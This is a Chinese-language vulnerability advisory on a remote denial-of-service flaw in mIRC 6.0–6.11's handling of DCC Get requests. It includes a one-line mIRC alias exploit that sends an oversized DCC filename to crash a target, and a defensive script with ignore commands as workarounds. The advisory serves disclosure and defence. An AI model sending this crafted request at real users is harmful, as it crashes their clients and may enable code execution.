安全研究

安全漏洞
mIRC DCC Get对话远程拒绝服务攻击漏洞

发布日期:2004-01-26
更新日期:2004-02-04

受影响系统:
Khaled Mardam-Bey mIRC 6.11
Khaled Mardam-Bey mIRC 6.1
Khaled Mardam-Bey mIRC 6.03
Khaled Mardam-Bey mIRC 6.02
Khaled Mardam-Bey mIRC 6.01
Khaled Mardam-Bey mIRC 6.0
描述:
BUGTRAQ  ID: 9492

mIRC是一款流行的基于Windows的聊天程序。

mIRC不正确处理DCC Get对话请求,远程攻击者可以利用这个漏洞进行拒绝服务攻击,存在执行任意代码可能。

提交特殊的DCC Get对话请求,在特殊情况下,可使应用程序崩溃,虽然没有得到证实,但此漏洞可能导致以mIRC进程权限执行任意代码。

<*来源:MASTER VI (admin@viperion.net
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

MASTER VI (admin@viperion.net)提供了如下测试方法:

alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在"remotes"段中粘贴如下内容:

ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt }

* 通过使用/ignore -d *或/ignore -wd *命令忽略所有DCC请求。

厂商补丁:

Khaled Mardam-Bey
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mirc.com/index.html

浏览次数:2692
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障